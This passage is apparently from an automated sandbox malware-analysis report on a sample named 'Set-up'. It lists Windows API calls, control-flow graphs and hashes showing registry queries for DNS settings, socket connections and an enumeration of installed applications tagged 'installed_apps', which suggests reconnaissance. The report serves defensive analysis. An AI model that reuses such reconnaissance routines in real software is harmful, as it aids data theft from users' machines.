                                    • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 00D3ABF0
                                    • RegCloseKey.ADVAPI32(?), ref: 00D3AC2A
                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00D3AC46
                                    • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 00D3AC71
                                    • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 00D3ACB4
                                    • RegCloseKey.ADVAPI32(?), ref: 00D3ACEE
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00D3AD0A
                                    • RegEnumKeyExA.KERNELBASE ref: 00D3AD8D
                                    • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00D3ADB0
                                    • RegCloseKey.KERNELBASE(?), ref: 00D3ADD9
                                    • RegEnumKeyExA.KERNELBASE ref: 00D3AE08
                                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00D3AE2A
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00D3AE54
                                    • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 00D3AEA3
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00D3AF18
                                    • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00D3AF2C
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00D3AF63
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00D3AFB2
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00D3B027
                                    • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00D3B03B
                                    • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00D3B072
                                    • RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 00D3B0C1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
                                    • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                    • API String ID: 1856363200-1047472027
                                    • Opcode ID: ed01038d60ebed7416c682f91a141d0eeb202821ee8c670adbbfb6b187ec406a
                                    • Instruction ID: 566b1854f8bcd86946c9918678a38e2fb4e5eca3a95ea14431c9a36504e5a8de
                                    • Opcode Fuzzy Hash: ed01038d60ebed7416c682f91a141d0eeb202821ee8c670adbbfb6b187ec406a
                                    • Instruction Fuzzy Hash: 4282A1B1604301AFE3209F29DC85B6BBBE8EF95740F184829F985D7291E771E944CB62

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 582 d49740-d4975b 583 d49780-d49782 582->583 584 d4975d-d49768 call d478a0 582->584 585 d49914-d4994e memset RegOpenKeyExA 583->585 586 d49788-d497a0 getenv call d478a0 583->586 595 d4976e-d49770 584->595 596 d499bb-d499c0 584->596 588 d49950-d49955 585->588 589 d4995a-d499ab RegQueryValueExA ExpandEnvironmentStringsA RegCloseKey strlen call d478a0 585->589 586->596 597 d497a6-d497c5 _stat64 586->597 592 d49a0c-d49a15 588->592 599 d499b0-d499b5 589->599 595->597 598 d49772-d4977e 595->598 596->592 600 d49827-d49833 597->600 601 d497c7-d497e0 597->601 598->586 599->596 599->597 602 d49835-d4985c call d3e2b0 * 2 600->602 603 d4985f-d49872 call d45ca0 600->603 605 d497f6-d49809 _stricmp 601->605 606 d497e2-d497f3 _time64 601->606 602->603 613 d499f0 603->613 614 d49878-d4987d call d477b0 603->614 605->600 607 d4980b-d49810 605->607 606->605 607->600 611 d49812-d49822 607->611 611->592 617 d499f5-d499fb call d45d00 613->617 621 d49882-d49889 614->621 626 d499fe-d49a09 617->626 621->617 624 d4988f-d4989b call d34fe0 621->624 624->613 629 d498a1-d498c3 _time64 call d478a0 624->629 626->592 633 d499c2-d499ed call d3e2b0 * 2 629->633 634 d498c9-d498db call d3e2d0 629->634 633->613 634->633 639 d498e1-d498f0 call d3e2d0 634->639 639->633 645 d498f6-d49905 call d463f0 639->645 649 d49f66-d49f7f call d45d00 645->649 650 d4990b-d4990f 645->650 649->626 652 d49a3f-d49a5a call d46740 call d463f0 650->652 652->649 658 d49a60-d49a6e call d46d60 652->658 661 d49a70-d49a94 call d46200 call d467e0 call d46320 658->661 662 d49a1f-d49a39 call d46840 call d463f0 658->662 673 d49a16-d49a19 661->673 674 d49a96-d49ac6 call d3d120 661->674 662->649 662->652 673->662 675 d49fc1 673->675 680 d49ae1-d49af7 call d3d190 674->680 681 d49ac8-d49adb call d3d120 674->681 677 d49fc5-d49ffd call d45d00 call d3e2b0 * 2 675->677 677->626 680->662 687 d49afd-d49b09 call d34fe0 680->687 681->662 681->680 687->675 693 d49b0f-d49b29 call d3e730 687->693 698 d49f84-d49f88 693->698 699 d49b2f-d49b3a call d478a0 693->699 701 d49f95-d49f99 698->701 699->698 706 d49b40-d49b54 call d3e760 699->706 703 d49fa0-d49fb6 call d3ebf0 * 2 701->703 704 d49f9b-d49f9e 701->704 716 d49fb7-d49fbe 703->716 704->675 704->703 712 d49f8a-d49f92 706->712 713 d49b5a-d49b6e call d3e730 706->713 712->701 719 d49b70-d4a004 713->719 720 d49b8c-d49b97 call d463f0 713->720 716->675 724 d4a015-d4a01d 719->724 728 d49b9d-d49bbf call d46740 call d463f0 720->728 729 d49c9a-d49cab call d3ea00 720->729 726 d4a024-d4a045 call d3ebf0 * 2 724->726 727 d4a01f-d4a022 724->727 726->677 727->677 727->726 728->729 747 d49bc5-d49bda call d46d60 728->747 736 d49f31-d49f35 729->736 737 d49cb1-d49ccd call d3ea00 call d3e960 729->737 741 d49f37-d49f3a 736->741 742 d49f40-d49f61 call d3ebf0 * 2 736->742 756 d49cfd-d49d0e call d3e960 737->756 757 d49ccf 737->757 741->662 741->742 742->662 747->729 755 d49be0-d49bf4 call d46200 call d467e0 747->755 755->729 775 d49bfa-d49c0b call d46320 755->775 766 d49d10 756->766 767 d49d53-d49d55 756->767 761 d49cd1-d49cec call d3e9f0 call d3e4a0 757->761 780 d49d47-d49d51 761->780 781 d49cee-d49cfb call d3e9d0 761->781 770 d49d12-d49d2d call d3e9f0 call d3e4a0 766->770 773 d49e69-d49e8e call d3ea40 call d3e440 767->773 798 d49d2f-d49d3c call d3e9d0 770->798 799 d49d5a-d49d6f call d3e960 770->799 795 d49e94-d49eaa call d3e3c0 773->795 796 d49e90-d49e92 773->796 791 d49b75-d49b86 call d3ea00 775->791 792 d49c11-d49c1c call d47b70 775->792 786 d49dca-d49ddb call d3e960 780->786 781->756 781->761 802 d49ddd-d49ddf 786->802 803 d49e2e-d49e36 786->803 791->720 814 d49f2d 791->814 792->720 817 d49c22-d49c33 call d3e960 792->817 821 d49eb0-d49eb1 795->821 822 d4a04a-d4a04c 795->822 801 d49eb3-d49ec4 call d3e9c0 796->801 798->770 825 d49d3e-d49d42 798->825 818 d49d71-d49d73 799->818 819 d49dc2 799->819 801->662 830 d49eca-d49ed0 801->830 810 d49e06-d49e21 call d3e9f0 call d3e4a0 802->810 812 d49e3d-d49e5b call d3ebf0 * 2 803->812 813 d49e38-d49e3b 803->813 850 d49de1-d49dee call d3ec80 810->850 851 d49e23-d49e2c call d3eac0 810->851 820 d49e5e-d49e67 812->820 813->812 813->820 814->736 835 d49c35 817->835 836 d49c66-d49c75 call d478a0 817->836 828 d49d9a-d49db5 call d3e9f0 call d3e4a0 818->828 819->786 820->773 820->801 821->801 833 d4a057-d4a070 call d3ebf0 * 2 822->833 834 d4a04e-d4a051 822->834 825->773 870 d49d75-d49d82 call d3ec80 828->870 871 d49db7-d49dc0 call d3eac0 828->871 840 d49ee5-d49ef2 call d3e9f0 830->840 833->716 834->675 834->833 842 d49c37-d49c51 call d3e9f0 _stricmp 835->842 862 d4a011 836->862 863 d49c7b-d49c8f call d3e7c0 836->863 840->662 856 d49ef8-d49f0e call d3e440 840->856 842->720 867 d49c57-d49c64 call d3e9d0 842->867 873 d49df1-d49e04 call d3e960 850->873 851->873 878 d49f10-d49f26 call d3e3c0 856->878 879 d49ed2-d49edf call d3e9e0 856->879 862->724 863->720 883 d49c95-d4a00e 863->883 867->836 867->842 885 d49d85-d49d98 call d3e960 870->885 871->885 873->803 873->810 878->879 895 d49f28 878->895 879->662 879->840 883->862 885->819 885->828 895->675
                                    APIs
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 00D4978D
                                    • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 00D497BA
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00D497E4
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00D498A5
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 00D49920
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00D49946
                                    • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00D49974
                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 00D49981
                                    • RegCloseKey.ADVAPI32(?), ref: 00D4998B
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00D49992
                                    • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00D497FE
                                      • Part of subcall function 00D478A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,00D4E16D,?), ref: 00D478AF
                                      • Part of subcall function 00D478A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 00D478D9
                                    • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 00D49C46
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
                                    • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                    • API String ID: 3843116398-4129964100
                                    • Opcode ID: 0f02bfc531125de77940e23981acdaa2b8964f7e0f1159c6bcd4abd465c63194
                                    • Instruction ID: 4c8e85200e27dea35d6e2fddc7edd741e4432c792ecab18b6bf0808f3a5f0ed6
                                    • Opcode Fuzzy Hash: 0f02bfc531125de77940e23981acdaa2b8964f7e0f1159c6bcd4abd465c63194
                                    • Instruction Fuzzy Hash: 4132B4B6904201ABEB11AB25EC52B1BB7A8EF54314F0C4434F94996293FB31ED15DBB3

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1392 e5e5d0-e5e602 strlen MultiByteToWideChar 1393 e5e6b0-e5e6bb GetLastError 1392->1393 1394 e5e608 1392->1394 1395 e5e6e2-e5e6f2 GetLastError 1393->1395 1396 e5e6bd-e5e6d4 MultiByteToWideChar 1393->1396 1397 e5e60f-e5e643 call 1009f40 MultiByteToWideChar 1394->1397 1399 e5e6f4-e5e6ff fopen 1395->1399 1400 e5e703-e5e70a 1395->1400 1396->1395 1398 e5e6d6-e5e6dd 1396->1398 1397->1400 1403 e5e649-e5e66d strlen MultiByteToWideChar 1397->1403 1398->1397 1399->1400 1404 e5e701 1403->1404 1405 e5e673-e5e683 _wfopen 1403->1405 1404->1400 1405->1400 1406 e5e685-e5e68e _errno 1405->1406 1407 e5e6a0-e5e6ae fopen 1406->1407 1408 e5e690-e5e69e _errno 1406->1408 1407->1400 1408->1400 1408->1407
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E5E2
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00E5E5FA
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 00E5E637
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00DEA31E), ref: 00E5E64D
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00DEA31E,00000001,?,00000008,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000), ref: 00E5E665
                                    • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E678
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E685
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E690
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00DEA31E,?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E), ref: 00E5E6A6
                                    • GetLastError.KERNEL32(?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E6B0
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00E5E6CC
                                    • GetLastError.KERNEL32(?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E6E2
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00DEA31E,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E6FA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
                                    • String ID:
                                    • API String ID: 2867842857-0
                                    • Opcode ID: 8a9120b0252292c3366326e8f2fe3843e69770b42fbe6765a0c729fac9f6a794
                                    • Instruction ID: bdf53d1d067f79c0e59de66420423ec6bc687692fcddd1d3d7d8d14edb0c62aa
                                    • Opcode Fuzzy Hash: 8a9120b0252292c3366326e8f2fe3843e69770b42fbe6765a0c729fac9f6a794
                                    • Instruction Fuzzy Hash: 6E312479600201BFEB346E74DC49F7B376DEB54756F148825FA02D92C0EB30EA148B61

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1409 cb8b50-cb8b69 1410 cb8b6b-cb8b74 1409->1410 1411 cb8be6 1409->1411 1413 cb8beb-cb8bf2 1410->1413 1414 cb8b76-cb8b8d 1410->1414 1412 cb8be9 1411->1412 1412->1413 1415 cb8b8f-cb8ba7 call c96e40 1414->1415 1416 cb8bf3-cb8bfe call cba550 1414->1416 1423 cb8cd9-cb8d16 SleepEx getsockopt 1415->1423 1424 cb8bad-cb8baf 1415->1424 1421 cb8de4-cb8def 1416->1421 1422 cb8c04-cb8c08 1416->1422 1427 cb8e8c-cb8e95 1421->1427 1428 cb8df5-cb8e19 call cba150 WSASetLastError 1421->1428 1429 cb8c0e-cb8c1d 1422->1429 1430 cb8dbd-cb8dc3 1422->1430 1425 cb8d18-cb8d20 WSAGetLastError 1423->1425 1426 cb8d22 1423->1426 1431 cb8ca6-cb8cb0 1424->1431 1432 cb8bb5-cb8bb9 1424->1432 1433 cb8d26-cb8d39 1425->1433 1426->1433 1434 cb8f00-cb8f06 1427->1434 1435 cb8e97-cb8e9c 1427->1435 1454 cb8e1b-cb8e26 1428->1454 1455 cb8e88 1428->1455 1438 cb8c1f-cb8c2f connect 1429->1438 1439 cb8c35-cb8c48 WSAGetLastError call cba150 1429->1439 1430->1412 1431->1423 1437 cb8cb2-cb8cb8 1431->1437 1432->1413 1440 cb8bbb-cb8bc2 1432->1440 1442 cb8d3b-cb8d3d 1433->1442 1443 cb8d43-cb8d61 call c9d8c0 call cba150 1433->1443 1434->1413 1444 cb8edf-cb8eef call c878b0 1435->1444 1445 cb8e9e-cb8eb6 call c92a00 1435->1445 1447 cb8cbe-cb8cd4 call cbb180 1437->1447 1448 cb8ddc-cb8dde 1437->1448 1438->1439 1458 cb8c4d-cb8c4f 1439->1458 1440->1413 1441 cb8bc4-cb8bcc 1440->1441 1450 cb8bce-cb8bd2 1441->1450 1451 cb8bd4-cb8bda 1441->1451 1442->1443 1442->1448 1479 cb8d66-cb8d74 1443->1479 1468 cb8ef2-cb8efc 1444->1468 1445->1444 1472 cb8eb8-cb8edd call c93410 * 2 1445->1472 1447->1421 1448->1412 1448->1421 1450->1413 1450->1451 1451->1413 1462 cb8bdc-cb8be1 1451->1462 1465 cb8e28-cb8e2c 1454->1465 1466 cb8e2e-cb8e85 call c9d090 call cc4fd0 1454->1466 1455->1427 1460 cb8c8e-cb8c93 1458->1460 1461 cb8c51-cb8c58 1458->1461 1473 cb8c99-cb8c9f 1460->1473 1474 cb8dc8-cb8dd9 call cbb100 1460->1474 1461->1460 1469 cb8c5a-cb8c62 1461->1469 1470 cb8dac-cb8db8 call cc50a0 1462->1470 1465->1455 1465->1466 1466->1455 1468->1434 1476 cb8c6a-cb8c70 1469->1476 1477 cb8c64-cb8c68 1469->1477 1470->1413 1472->1468 1473->1431 1474->1448 1476->1460 1484 cb8c72-cb8c8b call cc50a0 1476->1484 1477->1460 1477->1476 1479->1413 1486 cb8d7a-cb8d81 1479->1486 1484->1460 1486->1413 1491 cb8d87-cb8d8f 1486->1491 1493 cb8d9b-cb8da1 1491->1493 1494 cb8d91-cb8d95 1491->1494 1493->1413 1497 cb8da7 1493->1497 1494->1413 1494->1493 1497->1470
                                    APIs
                                    • connect.WS2_32(?,?,00000001), ref: 00CB8C2F
                                    • WSAGetLastError.WS2_32 ref: 00CB8C39
                                    • SleepEx.KERNELBASE(00000000,00000000), ref: 00CB8CF3
                                    • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00CB8D0E
                                    • WSAGetLastError.WS2_32 ref: 00CB8D18
                                    • WSASetLastError.WS2_32(00000000), ref: 00CB8E0C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ErrorLast$Sleepconnectgetsockopt
                                    • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                    • API String ID: 2513251565-879669977
                                    • Opcode ID: 0bf2ad87901c114e52f0c6a17a56fd4651442bd3f766606005bab106b6aa949b
                                    • Instruction ID: 393b9fc21d82646c7583b47e4cf13e19516e6ef6719861814e07f8bda075dbde
                                    • Opcode Fuzzy Hash: 0bf2ad87901c114e52f0c6a17a56fd4651442bd3f766606005bab106b6aa949b
                                    • Instruction Fuzzy Hash: 91B1A174604346AFDB10CF34CD85BA6BBE8AF45314F04892DE869872D2DB70ED59C761

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1638 c82f17-c82f8c call 1155ff0 call 11563e0 1643 c831c9-c831cd 1638->1643 1644 c82f91-c82ff4 call c81619 RegOpenKeyExA 1643->1644 1645 c831d3-c831d6 1643->1645 1648 c82ffa-c8300b 1644->1648 1649 c831c5 1644->1649 1650 c8315c-c831ac RegEnumKeyExA 1648->1650 1649->1643 1651 c83010-c83083 call c81619 RegOpenKeyExA 1650->1651 1652 c831b2-c831c2 1650->1652 1656 c83089-c830d4 RegQueryValueExA 1651->1656 1657 c8314e-c83152 1651->1657 1652->1649 1658 c8313b-c8314b RegCloseKey 1656->1658 1659 c830d6-c83137 call 11562c0 call 1156350 call 11563e0 call 11561f0 call 11563e0 call 1154750 1656->1659 1657->1650 1658->1657 1659->1658
                                    APIs
                                    Strings
                                    • installed_apps, xrefs: 00C82F36
                                    • d, xrefs: 00C82FA0
                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00C82F49, 00C82F71
                                    • SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00C82F5D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: EnumOpen
                                    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$d$installed_apps
                                    • API String ID: 3231578192-797059590
                                    • Opcode ID: c5719ddf0294dd34bc33505e3603c42ce9e44cc7775b3cc1e8033a3dc09b5ed4
                                    • Instruction ID: a0693389b226d582175a6d4fce7edd328770dbe547f986d8951800096d3286e7
                                    • Opcode Fuzzy Hash: c5719ddf0294dd34bc33505e3603c42ce9e44cc7775b3cc1e8033a3dc09b5ed4
                                    • Instruction Fuzzy Hash: 3F7181B4904319DFDB54EF69C58479EBBF0BF84308F10885DE998A7201E7749A88CF92

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
